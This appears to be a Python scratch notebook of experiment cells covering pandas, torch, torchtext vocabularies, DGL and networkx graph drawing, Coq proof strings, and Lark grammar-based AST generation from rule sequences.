lower_cummulative_val = get_lower_cummulative(file_idx)
node_idx = idx - lower_cummulative_val
# print(node_idx)
node = files[file][node_idx]
# print(node)
return node
for idx in range(5 + 7 + 2):
node = get_node_idx(idx)
print(node)
print()
# %%
# computing cummulative sums counts frequencies
import pandas as pd
# importing numpy module
import numpy as np
# making list of values
values = [3, 4, 7, 2, 0]
# making series from list
series = pd.Series(values)
# calling method
cumsum = list(series.cumsum())
cumsum = np.array(series.cumsum())
# display
print(cumsum)
# %%
# splitting list of files into 3 train, val, test
import numpy as np
def split_two(lst, ratio=[0.5, 0.5]):
assert (np.sum(ratio) == 1.0) # makes sure the splits make sense
train_ratio = ratio[0]
# note this function needs only the "middle" index to split, the remaining is the rest of the split
indices_for_splittin = [int(len(lst) * train_ratio)]
train, test = np.split(lst, indices_for_splittin)
return train, test
def split_three(lst, ratio=[0.8, 0.1, 0.1]):
import numpy as np
train_r, val_r, test_r = ratio
assert (np.sum(ratio) == 1.0) # makes sure the splits make sense
# note we only need to give the first 2 indices to split, the last one it returns the rest of the list or empty
indicies_for_splitting = [int(len(lst) * train_r), int(len(lst) * (train_r + val_r))]
train, val, test = np.split(lst, indicies_for_splitting)
return train, val, test
files = list(range(10))
train, test = split_two(files)
print(train, test)
train, val, test = split_three(files)
print(train, val, test)
# %%
from typing import List, NewType
# https://stackoverflow.com/questions/33045222/how-do-you-alias-a-type-in-python
Vector = List[float] # alias shortens
URL = NewType("URL", str) # new type
# this is better since URL is a string but any string is NOT usually a URL
print(URL is str)
# %%
# convert list of ints to tensor
import torch
y_batch = [944104324, 146561759, 938461041, 1035383419]
y_batch = torch.tensor(y_batch)
print(y_batch)
print(type(y_batch))
print(y_batch.dtype)
# %%
# counter
from collections import Counter
vocab = Counter()
lst = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4]
for elem in lst:
vocab.update([elem])
print(vocab)
vocab.update(lst)
print(vocab)
print(Counter(['a', 'a', 'b']))
# Counter({'R': 1, 'A': 1, 'Coq.Relations.Relation_Operators.clos_refl_trans': 1, '0': 1})
# vocab.update(['adsf'])
# vocab
# Counter({'R': 1, 'A': 1, 'Coq.Relations.Relation_Operators.clos_refl_trans': 1, '0': 1, 'adsf': 1})
# Counter(a=0)
# Counter({'a': 0})
# vocab.update({'qwert':0}
# %%
from argparse import Namespace
opts = Namespace(rank=-1, world_size=0, batch_size=4, split='train', num_workers=0)
opts.path2dataprep = Path('~/data/lasse_datasets_coq/dag_data_prep.pt').expanduser()
opts.path2vocabs = Path('~/data/lasse_datasets_coq/dag_counters.pt').expanduser()
opts.path2hash2idx = Path('~/data/lasse_datasets_coq/dag_hash2index.pt').expanduser()
counters = torch.load(opts.path2vocabs)
vocab = counters['leafs_counter']
constructors = counters['cons_counter']
db_hash2idx = torch.load(opts.path2hash2idx)
hash2idx = db_hash2idx['hash2idx']
num_tactic_hashes = len(hash2idx.keys())
# %%
# https://pytorch.org/tutorials/beginner/text_sentiment_ngrams_tutorial.html
import torchtext
from collections import Counter
# text_pipeline = lambda x: [vocab[token] for token in tokenizer(x)]
# label_pipeline = lambda x: int(x) - 1
counter = Counter()
counter.update(['a', 'a', 'a', 'bob', 'bob', 'cat', 'dog'])
print(counter)
vocab = torchtext.vocab.Vocab(counter)
vocab2 = torchtext.vocab.Vocab(counter, min_freq=2)
print(vocab)
# print('a' in vocab)
print(vocab['a'])
print(vocab['bob'])
print(vocab['cat'])
print(vocab['dog'])
print(vocab['asdf'])
print()
print(vocab2['a'])
print(vocab2['bob'])
print(vocab2['cat'])
print(vocab2['dog'])
print(vocab['asdf'])
print()
print(len(vocab))
# text_pipeline = lambda x: [vocab[token] for token in tokenizer(x)]
#
# from torch.utils.data import DataLoader
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#
# def collate_batch(batch):
# label_list, text_list, offsets = [], [], [0]
# for (_label, _text) in batch:
# label_list.append(label_pipeline(_label))
# processed_text = torch.tensor(text_pipeline(_text), dtype=torch.int64)
# text_list.append(processed_text)
# offsets.append(processed_text.size(0))
# label_list = torch.tensor(label_list, dtype=torch.int64)
# offsets = torch.tensor(offsets[:-1]).cumsum(dim=0)
# text_list = torch.cat(text_list)
# return label_list.to(device), text_list.to(device), offsets.to(device)
#
# train_iter = AG_NEWS(split='train')
# dataloader = DataLoader(train_iter, batch_size=8, shuffle=False, collate_fn=collate_batch)
# %%
import torch
x = torch.randn([1, 4])
y = torch.randn([1, 4])
xy = torch.stack([x, y])
print(xy.size())
xy = torch.cat([x, y])
print(xy.size())
# %%
"""
python -m memory_profiler file.py
"""
# %%
# list of letters
letters = ['a', 'b', 'd', 'e', 'i', 'j', 'o']
# function that filters vowels
def filter_vowels(letter):
vowels = ['a', 'e', 'i', 'o', 'u']
if letter in vowels:
return True
else:
return False
print(filter)
filtered_vowels = filter(filter_vowels, letters)
print('The filtered vowels are:')
for vowel in filtered_vowels:
print(vowel)
# %%
# The filter() method constructs an iterator from elements of an iterable for which a function returns true.
# filter things that are not None, i.e. we want to keep things that are not None.
list2filter = ['a', 'b', None]
print(list2filter)
filteredlist = filter(lambda x: x is not None, list2filter)
print(list(filteredlist))
# this is much better: https://stackoverflow.com/questions/61925671/use-only-some-items-in-a-list-comprehension
# %%
import capnp
# import dag_api_capnp
capnp.remove_import_hook()
try:
# first try to see if we are running a benchmark & the capnp schema is in the share conda folder
dag_api_capnp = str(Path(os.environ['CONDA_PREFIX'] + '/share/dag_api.capnp').expanduser())
dag_api_capnp = capnp.load(dag_api_capnp)
except:
# else run the one in the main project folder
dag_api_capnp = str(Path('~/coq-tactician-graph/src/dag_api.capnp').expanduser())
dag_api_capnp = capnp.load(dag_api_capnp)
# %%
import capnp
capnp.remove_import_hook()
example_msg_capnp = Path("~/ultimate-utils/example_msg.capnp").expanduser()
example_msg_capnp = capnp.load(str(example_msg_capnp))
# Building
addresses = example_msg_capnp.AddressBook.newMessage()
people = addresses.init('people', 1)
# %%
# python index slicing
lst = [1, 2, 3, 4]
print(lst[:0])
print(lst[:1])
print(lst[:2])
# its non inclusive
# %%
import dgl.data
dataset = dgl.data.CoraGraphDataset()
print('Number of categories:', dataset.num_classes)
# %%
import dgl
import numpy as np
import torch
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
u = np.concatenate([src, dst])
v = np.concatenate([dst, src])
# Construct a DGLGraph
dgl.DGLGraph((u, v))
# %%
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
nx_G = g.to_networkx().to_undirected()
print(f'{nx_G=}')
# Kamada-Kawaii layout usually looks pretty for arbitrary graphs
pos = nx.kamada_kawai_layout(nx_G)
nx.draw(nx_G, pos, with_labels=True)
plt.show()
# %%
# https://stackoverflow.com/questions/28533111/plotting-networkx-graph-with-node-labels-defaulting-to-node-name
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
labels = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app5"}
# Kamada-Kawaii layout usually looks pretty for arbitrary graphs
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, labels=labels, with_labels=True)
plt.show()
# %%
from graphviz import Digraph
g = Digraph('G', filename='hello2.gv')
print(f'{g=}')
g.edge('Hello', 'World')
g.view()
# %%
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
g = nx.nx_agraph.to_agraph(g)
g.layout()
# g.draw()
g.draw("file.png")
print(f'{g=}')
# plt.show()
# from IPython.display import Image, display
#
# def view_pydot(pdot):
# plt = Image(pdot.create_png())
# display(plt)
#
# view_pydot(g)
# %%
# https://stackoverflow.com/questions/28533111/plotting-networkx-graph-with-node-labels-defaulting-to-node-name
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
# relabel
int2label = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app5"}
g = nx.relabel_nodes(g, int2label)
# Kamada-Kawaii layout usually looks pretty for arbitrary graphs
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, with_labels=True)
plt.show()
#%%
# https://stackoverflow.com/questions/28533111/plotting-networkx-graph-with-node-labels-defaulting-to-node-name
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from pathlib import Path
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
# relabel
int2label = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app5"}
g = nx.relabel_nodes(g, int2label)
# https://networkx.org/documentation/stable/reference/drawing.html#module-networkx.drawing.layout
g = nx.nx_agraph.to_agraph(g)
print(f'{g=}')
print(f'{g.string()=}')
# draw
g.layout()
g.draw("file.png")
# https://stackoverflow.com/questions/20597088/display-a-png-image-from-python-on-mint-15-linux
img = mpimg.imread('file.png')
plt.imshow(img)
plt.show()
# remove file https://stackoverflow.com/questions/6996603/how-to-delete-a-file-or-folder
Path('./file.png').expanduser().unlink()
# import os
# os.remove('./file.png')
# %%
# networkx to dgl: https://docs.dgl.ai/en/0.6.x/generated/dgl.from_networkx.html
import dgl
import networkx as nx
import numpy as np
import torch
nx_g = nx.DiGraph()
# Add 3 nodes and two features for them
nx_g.add_nodes_from([0, 1, 2], feat1=np.zeros((3, 1)), feat2=np.ones((3, 1)))
# Add 2 edges (1, 2) and (2, 1) with two features, one being edge IDs
nx_g.add_edge(1, 2, weight=np.ones((1, 1)), eid=np.array([1]))
nx_g.add_edge(2, 1, weight=np.ones((1, 1)), eid=np.array([0]))
g = dgl.from_networkx(nx_g)
# ... https://docs.dgl.ai/en/0.6.x/generated/dgl.from_networkx.html
# %%
import networkx as nx
import matplotlib.pyplot as plt
G = nx.Graph()
G.add_node('a')
G.add_node('b', attr1='cons')
print(f'{G=}')
pos = nx.kamada_kawai_layout(G)
nx.draw(G, pos, with_labels=True)
plt.show()
# adding reated edges and nodes: https://stackoverflow.com/questions/28488559/networkx-duplicate-edges/51611005
#%%
import pylab
import networkx as nx
g=nx.Graph()
g.add_node('Golf',size='small')
g.add_node('Hummer',size='huge')
g.add_edge('Golf','Hummer')
labels = nx.get_node_attributes(g, 'size')
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, labels=labels, with_labels=True)
# nx.draw(g, labels=labels)
pylab.show()
#%%
import dgl
import numpy as np
import torch
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from pathlib import Path
g = dgl.graph(([0, 0, 0, 0, 0], [1, 2, 3, 4, 5]), num_nodes=6)
print(f'{g=}')
print(f'{g.edges()=}')
# Since the actual graph is undirected, we convert it for visualization purpose.
g = g.to_networkx().to_undirected()
print(f'{g=}')
# relabel
int2label = {0: "app", 1: "cons", 2: "with", 3: "app3", 4: "app4", 5: "app"}
g = nx.relabel_nodes(g, int2label)
# https://networkx.org/documentation/stable/reference/drawing.html#module-networkx.drawing.layout
g = nx.nx_agraph.to_agraph(g)
print(f'{g=}')
print(f'{g.string()=}')
# draw
g.layout()
g.draw("file.png")
# https://stackoverflow.com/questions/20597088/display-a-png-image-from-python-on-mint-15-linux
img = mpimg.imread('file.png')
plt.imshow(img)
plt.show()
# remove file https://stackoverflow.com/questions/6996603/how-to-delete-a-file-or-folder
Path('./file.png').expanduser().unlink()
# import os
# os.remove('./file.png')
#%%
import pylab
import networkx as nx
g=nx.Graph()
g.add_node('Golf',size='small')
g.add_node('Hummer',size='huge')
g.add_edge('Golf','Hummer')
labels = nx.get_node_attributes(g, 'size')
pos = nx.kamada_kawai_layout(g)
nx.draw(g, pos, labels=labels, with_labels=True)
pylab.show()
#%%
import pygraphviz as pgv
g = pgv.AGraph()
g.add_node('Golf',label='small')
g.add_node('Hummer',label='huge')
g.add_edge('Golf','Hummer')
# labels = nx.get_node_attributes(g, 'size')
# pos = nx.kamada_kawai_layout(g)
# nx.draw(g, pos, labels=labels, with_labels=True)
# pylab.show()
g.layout()
g.draw('file.png')
img = mpimg.imread('file.png')
plt.imshow(img)
plt.show()
# Path('./file.png').expanduser().unlink()
#%%
import pygraphviz as pgv
G=pgv.AGraph()
ndlist = [1,2,3]
for node in ndlist:
# label = "Label #" + str(node)
label = "app"
G.add_node(node, label=label)
G.layout()
G.draw('example.png', format='png')
img = mpimg.imread('example.png')
plt.imshow(img)
plt.show()
# Path('./file.png').expanduser().unlink()
#%%
# load a graph from a dot for networkx: https://stackoverflow.com/questions/42172548/read-dot-graph-in-networkx-from-a-string-and-not-file
# G = nx_agraph.from_agraph(pygraphviz.AGraph(dotFormat))
#%%
import dgl.data
dataset = dgl.data.CoraGraphDataset()
print('-- my print statments --')
print('Number of categories: {dataset.num_classes} \n')
g = dataset[0]
print(f'{g=}')
# print('Node features')
# print(g.ndata)
# print('Edge features')
# print(g.edata)
h_node_features = g.ndata['feat']
print(h_node_features.size())
#%%
# import dgl
import networkx as nx
import numpy as np
import torch
nx_g = nx.DiGraph()
# Add 3 nodes and two features for them
nx_g.add_nodes_from([0, 1, 2], feat1=np.zeros((3, 1)), feat2=np.ones((3, 1)))
print(f'{nx_g=}')
# Add 2 edges (1, 2) and (2, 1) with two features, one being edge IDs
nx_g.add_edge(1, 2, weight=np.ones((1, 1)), eid=np.array([1]))
nx_g.add_edge(2, 1, weight=np.ones((1, 1)), eid=np.array([0]))
print(f'{nx_g=}')
#%%
import random
foo = ['a', 'b', 'c', 'd', 'e']
print(random.choice(foo))
#%%
pf_body1 = ['Proof.',
'unfold lookup_incl;', 'simpl;', 'intros.',
'match_destr;', 'unfold equiv in *;', 'subst.',
'- apply lookup_in in H1.',
'apply in_dom in H1.',
'intuition.',
'- auto.',
'Qed.']
pf_body1 = pf_body1[1:-1]
print(pf_body1)
#%%
pf_body1 = [ 'Proof.',
'unfold lookup_incl;', 'simpl;', 'intros.',
'match_destr;', 'unfold equiv in *;', 'subst.',
'- apply lookup_in in H1.',
'apply in_dom in H1.',
'intuition.',
'- auto.',
'Qed.']
def mask_lemma_in_pf_body(pf_body:str, lemma:str, mask_token:str='<Predict>') -> str:
return [tactic_cmd.replace(lemma, mask_token) for tactic_cmd in pf_body]
print(mask_lemma(pf_body1, 'in_dom'))
#%%
x = [1,2]
xx = ['a','b']
print(list(zip(x,xx)))
#%%
thms = "lookup_incl_cons_l_nin (l1 l2:list (A*B)) x y : \
lookup_incl l1 l2 -> \
~ In x (domain l1) -> \
lookup_incl l1 ((x,y)::l2)."
pf_bodies = [['Proof.',
'unfold lookup_incl;', 'simpl;', 'intros.',
'match_destr;', 'unfold equiv in *;', 'subst.',
'- apply lookup_in in H1.',
'apply in_dom in H1.',
'intuition.',
'- auto.',
'Qed.']]
pf_bodies[0] = pf_body[0][1:-1]
#%%
from lark import Lark
json_parser = Lark(r"""
value: dict
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value')
text = '{}'
ast = json_parser.parse(text)
print(ast.pretty())
text = '{"key": ["item0", "item1", 3.14]}'
ast = json_parser.parse(text)
print(ast.pretty())
#%%
from lark import Lark
json_parser = Lark(r"""
value: dict dict "f"
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value')
text = '{} {} f'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# text = '{"key": ["item0", "item1", 3.14, "true"]}'
# ast = json_parser.parse(text)
# print(ast)
# print(ast.pretty())
#%%
from lark import Lark
json_parser = Lark(r"""
pair: pair "," pair // 1
| string // 2
string : "a" // 3
| "b" // 4
%import common.WS
%ignore WS
""", start='pair', keep_all_tokens=True)
text = 'a'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# rule seq
rule_seq = ['pair', 'string', "1"]
rule_seq2 = ['pair->string', 'string->1']
text = "a, b"
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
rule_seq2 = ['pair -> pair "," pair', 'pair->string', 'pair->string', 'string->a', 'string->b']
rule_seq3 = [1, 2, 2, 3, 4]
rule_seq3 = [1, 2, 2, 3, 3, 4, 5]
#%%
from lark import Lark, Tree, Token
json_parser = Lark(r"""
pair: pair "," pair // 1
| string // 2
string : "a" // 3
| "b" // 4
%import common.WS
%ignore WS
""", start='pair', keep_all_tokens=True)
text = 'a'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# rule seq
rule_seq = ['pair', 'string', "1"]
rule_seq2 = ['pair->string', 'string->1']
text = "a, b"
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
rule_seq2 = ['pair->pair "," pair', 'pair->string', 'pair->string', 'string->a', 'string->b']
rule_seq2 = [rule.split('->') for rule in rule_seq2]
rule_seq3 = [1, 2, 2, 3, 4]
non_terminals = ['pair', 'string']
terminals = [",", "a", "b"]
def is_terminal(sym):
# true if matches hardcoded symbols in grammar or a regex, note this only works if the nt has been checked first.
return sym in terminals # or matches regex
def is_non_terminal(sym):
return sym in non_terminals
def build_lark_tree(rule_seq:list[tuple]) -> Tree:
print(rule_seq)
nt, next_syms = rule_seq[0]
if len(rule_seq) == 1:
return Tree(nt, [Token('literal', next_syms)])
else:
rule_seq = rule_seq[1:]
next_syms = next_syms.split(" ")
asts = []
nt_idx = 0
for next_sym in next_syms:
if is_non_terminal(next_sym):
ast = Tree(next_sym, build_lark_tree(rule_seq[nt_idx:]))
nt_idx += 1
elif is_terminal(next_sym):
ast = Token('literal', next_sym)
else:
raise ValueError(f'Invalid: {next_sym} didnt match anything')
asts.append(ast)
return Tree(nt, asts)
print('---- generating ast from Rule Seq')
build_lark_tree(rule_seq2)
#%%
from collections import defaultdict
from lark import Lark, Tree, Token
from lark.grammar import Rule, NonTerminal, Symbol, Terminal
from lark.reconstruct import Reconstructor
def build(rules: list[Rule], rule_seq: list[int], build_term) -> Tree:
def build_rule(rule: Rule) -> Tree:
l = []
for i, e in enumerate(rule.expansion):
if e.is_term:
l.append(build_term(e))
else:
l.append(e)
targets[e].append((l, i))
return Tree(rule.origin.name, l)
out: list = [NonTerminal("start")]
targets = defaultdict(list)
targets[out[0]].append((out, 0))
for i in rule_seq:
r = rules[i]
assert r.alias is None, "Can't have aliases"
assert r.options.keep_all_tokens, "need to have keep_all_tokens"
assert not (r.options.expand1 or r.origin.name.startswith("_")), "Can't have a rule that expands it's children"
ts = targets[r.origin]
l, i = ts.pop(0)
assert l[i] == r.origin, l
l[i] = build_rule(r)
return out[0]
grammar = r"""
start: "a" // rule 0
| "a" start // rule 1
"""
parser = Lark(grammar, keep_all_tokens=True)
print(parser.rules)
rule_seq1 = [1, 0]
ast = build(parser.rules, rule_seq1, lambda t: Token(t.name, "a"))
print(ast)
text = Reconstructor(parser).reconstruct(ast, None) # has string "aa"
print(repr(text))
#%%
from collections import deque
# Initializing a queue
q = deque()
# Adding elements to a queue
q.append('a')
q.append('b')
q.append('c')
print("Initial queue")
print(q)
# Removing elements from a queue
print("\nElements dequeued from the queue")
print(q.popleft())
print(q.popleft())
print(q.popleft())
print("\nQueue after removing elements")
print(q)
#%%
# https://github.com/MegaIng/lark_ast_generator/blob/master/ast_generator.py#L114
#%%
from typing import Union
from collections import deque
from lark import Lark, Tree, Token
from lark.grammar import Rule, NonTerminal, Symbol, Terminal
from lark.reconstruct import Reconstructor
grammar = r"""
pair: pair "," pair // 1
| string // 2
string : "a" // 3
| "b" // 4
%import common.WS
%ignore WS
"""
parser = Lark(grammar, start='pair', keep_all_tokens=True)
print(parser.rules)
print(parser.rules[0])
#%%
# I want a queue that removes the
#%%
# from __future__ import annotations
from collections import defaultdict
from random import choice
from typing import Optional, Callable
from lark import Lark, Token, Tree, Transformer
from lark.grammar import Terminal, NonTerminal, Rule
from lark.lexer import TerminalDef
from lark.visitors import Interpreter
class ASTGenerator:
def __init__(self, parser: Lark, term_builder=None):
self.parser = parser
self.term_builder = term_builder
self.term_by_name = {t.name: t for t in self.parser.terminals}
self.rule_by_symbol = defaultdict(list)
for r in self.parser.rules:
self.rule_by_symbol[r.origin].append(r)
def _term_builder(self, term: Terminal):
term_def: TerminalDef = self.term_by_name[term.name]
if term_def.pattern.type == "str":
return Token(term.name, term_def.pattern.value)
elif self.term_builder:
return self.term_builder(term_def)
else:
raise ValueError("Can't build Token for Terminal %r" % term.name)
def _rule_builder(self, rule: Rule, hole: Hole):
children = []
for sym in rule.expansion:
if sym.is_term:
if not sym.filter_out or rule.options.keep_all_tokens:
children.append(self._term_builder(sym))
else:
children.append(sym)
tree = Tree(rule.alias or rule.origin.name, children)
if not rule.alias and (tree.data.startswith("_") or (rule.options.expand1 and len(children) == 1)):
hole.expand(tree)
else:
hole.fill(tree)
def start_build(self, start=None):
# We could just copy the code
start = self.parser.parser._verify_start(start)
return HoleTree(NonTerminal(start))
def build_absolute_index(self, hole_tree: HoleTree, rules: list[int]):
for i in rules:
r = self.parser.rules[i]
hole = hole_tree.get_for_symbol(r.origin)
self._rule_builder(r, hole)
def build_relative_index(self, hole_tree: HoleTree, rules: list[int]):
meaning = []
for i in rules:
hole = hole_tree.bfs_first_hole
options = self.rule_by_symbol[hole.symbol]
rule = options[i]
meaning.append((i, hole.path, rule))
self._rule_builder(rule, hole)
return meaning
def build_picker(self, hole_tree: HoleTree, picker: Callable[[list[Rule], Hole], Rule], n: int = None):
track = []
i = 0
while hole_tree.any_holes and (n is None or i < n):
hole = hole_tree.bfs_first_hole
options = self.rule_by_symbol[hole.symbol]
rule = picker(options, hole)
track.append(options.index(rule))
self._rule_builder(rule, hole)
i += 1
return track
class InlineTree(Tree):
pass
class Hole:
def __init__(self, target: Optional[list], index: int, hole_tree: HoleTree, path: tuple[int, ...]):
self.target = target
if target is None:
self.symbol = index
self.index = 0
else:
self.symbol = target[index]
self.index = index
assert isinstance(self.symbol, NonTerminal), self.symbol
self.hole_tree = hole_tree
self.path = path
def _get_holes(self, values, target, offset):
for i, v in enumerate(values):
if isinstance(v, NonTerminal):
yield Hole(target, offset + i, self.hole_tree, (*self.path, i))
def expand(self, tree: Tree):
assert self.target is not None, "start rule can't be inlined"
self.target[self.index] = InlineTree(tree.data, tree.children, tree.meta)
self.hole_tree.filled(self, self._get_holes(tree.children, tree.children, 0))
def fill(self, tree: Tree):
if self.target is None:
self.hole_tree.set_start(tree)
else:
self.target[self.index] = tree
self.hole_tree.filled(self, self._get_holes(tree.children, tree.children, 0))
def flatten_inline_tree(items):
"""Yield items from any nested iterable; see Reference."""
for x in items:
if isinstance(x, InlineTree):
for sub_x in flatten_inline_tree(x.children):
yield sub_x
else:
yield x
class _InlineExpands(Interpreter):
def __default__(self, tree):
new_tree = Tree(tree.data, list(flatten_inline_tree(tree.children)), tree.meta)
new_tree.children = self.visit_children(new_tree)
return new_tree
class HoleTree:
def __init__(self, start_symbol):
self._tree = None
self.holes_by_path = {}
self.holes_by_symbol = defaultdict(list)
self.holes_by_path[()] = Hole(None, start_symbol, self, ())
self.holes_by_symbol[start_symbol].append(self.holes_by_path[()])
def set_start(self, tree):
assert self._tree is None
self._tree = tree
def filled(self, old_hole, new_holes):
self.holes_by_symbol[old_hole.symbol].remove(old_hole)
assert self.holes_by_path.pop(old_hole.path) is old_hole
for nh in new_holes:
self.holes_by_symbol[nh.symbol].append(nh)
assert nh.path not in self.holes_by_path
self.holes_by_path[nh.path] = nh
def tree(self, raw:bool = False):
return _InlineExpands().visit(self._tree) if not raw else self._tree
@property
def bfs_first_hole(self):
return self.holes_by_path[min(self.holes_by_path, key=lambda t: (len(t), t))]
@property
def any_holes(self):
return bool(self.holes_by_path)
def get_for_symbol(self, symbol):
return self.holes_by_symbol[symbol][0]
def random_picker(options, hole):
return choice(options)
def depth(min_depth=3, max_depth=5, base=random_picker):
def picker(options: list[Rule], hole):
current = len(hole.path)
if current < min_depth:
new_options = [o for o in options
if any(not s.is_term for s in o.expansion)]
if new_options:
options = new_options
if current + 1 > max_depth:
new_options = [o for o in options
if all(s.is_term for s in o.expansion)]
if new_options:
options = new_options
return base(options, hole)
return picker
#%%
from collections import defaultdict
from operator import neg
from typing import Iterable
from lark import Lark, Tree, Token
from lark.grammar import Symbol, NonTerminal, Terminal
from lark.reconstruct import Reconstructor, is_iter_empty
from lark.tree_matcher import is_discarded_terminal, TreeMatcher
from lark.visitors import Transformer_InPlace, Interpreter
class RulesGenerator(Interpreter):
def __init__(self, parser):
super(RulesGenerator, self).__init__()
self.parser = parser
self.rules_by_name = defaultdict(list)
self.aliases = defaultdict(list)
for i, r in enumerate(self.parser.rules):
self.rules_by_name[r.origin.name].append((r, i))
if r.alias is not None:
self.rules_by_name[r.alias].append((r, i))
self.aliases[r.alias].append(r.origin.name)
for n, rs in self.rules_by_name.items():
self.rules_by_name[n] = sorted(rs, key=lambda t: -len(t[0].expansion))
self.tree_matcher = TreeMatcher(parser)
self.current_path = []
self.values = {}
def _check_name(self, data, target):
if data == target:
return True
elif data in self.aliases:
return target in self.aliases[data]
else:
return False
def _check_expansion(self, orig_expansion, expansion):
return len(orig_expansion) == len(expansion) and all(o == e for o, e in zip(orig_expansion, expansion))
def get_rule(self, tree):
candidates = self.rules_by_name[tree.data]
matches = [(r, i) for (r, i) in candidates
if self._check_expansion(tree.meta.orig_expansion, r.expansion)]
if not matches:
# Sometimes, tree_matcher returns weird self rules Tree('expansion', [Tree('expansion', [...])])
if len(tree.meta.orig_expansion) == 1 and self._check_name(tree.meta.orig_expansion[0].name, tree.data):
return None
assert matches, ("No rule left that was applied", tree, candidates)
assert len(matches) == 1, ("Can't decide which rule was applied", candidates, matches)
return matches[0][1]
def __default__(self, tree):
if not getattr(tree.meta, 'match_tree', False):
# print("|"*len(self.current_path), "old", tree)
tree = self.tree_matcher.match_tree(tree, tree.data)
# print("|"*len(self.current_path), tree)
r = self.get_rule(tree)
for i, c in enumerate(tree.children):
if isinstance(c, Tree):
self.current_path.append(i)
tree.children[i] = self.visit(c)
self.current_path.pop()
# print("|"*len(self.current_path),"final", tree)
if r is not None:
self.values[tuple(self.current_path)] = r
return tree
def get_rules(self, tree) -> Iterable[int]:
self.current_path = []
self.values = {}
self.visit(tree)
return [i for k, i in sorted(self.values.items(), key=lambda t: tuple(map(neg, t[0])))]
#%%
import pprint as pp
from lark import Lark
grammar = r"""
?pair: pair "," pair // 0
| string // 1
string : "a" -> aaa // 2
| "b" -> bbb // 3
%import common.WS
%ignore WS
"""
start = 'pair'
parser = Lark(grammar, start=start, keep_all_tokens=True)
# parser = Lark(grammar, start=start)
text = "a, b"
ast = parser.parse(text)
print(ast.pretty())
pp.pprint(parser.rules)
#%%
from lark import Lark
from lark.visitors import Transformer_InPlace, Interpreter
class Inte1(Interpreter):
def pair(self, tree):
print('pair')
self.visit_children(tree)
def string(self, tree):
print('string')
grammar = r"""
pair: pair "," pair // 0
| string // 1
string : "a" // 2
| "b" // 3
%import common.WS
%ignore WS
"""
start = 'pair'
parser = Lark(grammar, start=start, keep_all_tokens=True)
text = "a, b"
ast = parser.parse(text)
print(ast)
Inte1().visit(ast)
#%%
x = [1, 2, 5]
print(sorted(x))
x = [1.1, 1.5, 0.1, 1.0]
print(list(map(round, x)))
print(sorted(x, key=round))
from lark.tree_matcher import is_discarded_terminal, TreeMatcher
#%%
from lark import Lark
json_parser = Lark(r"""
value: dict
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value', keep_all_tokens=True)
text = '{}'
ast = json_parser.parse(text)
print(ast.pretty())
text = '{"key": ["item0", "item1", 3.14]}'
ast = json_parser.parse(text)
print(ast.pretty())
#%%
ctx = {'x': 1}
names = ['y', 'y']
all_names = set(list(ctx.keys()) + names)
print(all_names)
#%%
import re
bfs_regex = re.compile(r'x\d+')
assert not bfs_regex.match('x')
print(bfs_regex.match('x'))
print(bfs_regex.search('x'))
assert bfs_regex.match('x0')
print(bfs_regex.match('x0'))
print(bfs_regex.search('x0'))
#%%
print("_".join(['x0']))
print('123'.isnumeric())
print('asdfadsf'.isnumeric())
print('x123'.isnumeric())
#%%
# this checks that both tensors are actually the same
import torch
import torch.nn as nn
import torch.optim as optim
embeds = nn.Embedding(1, 1)
lin = nn.Linear(3, 1)
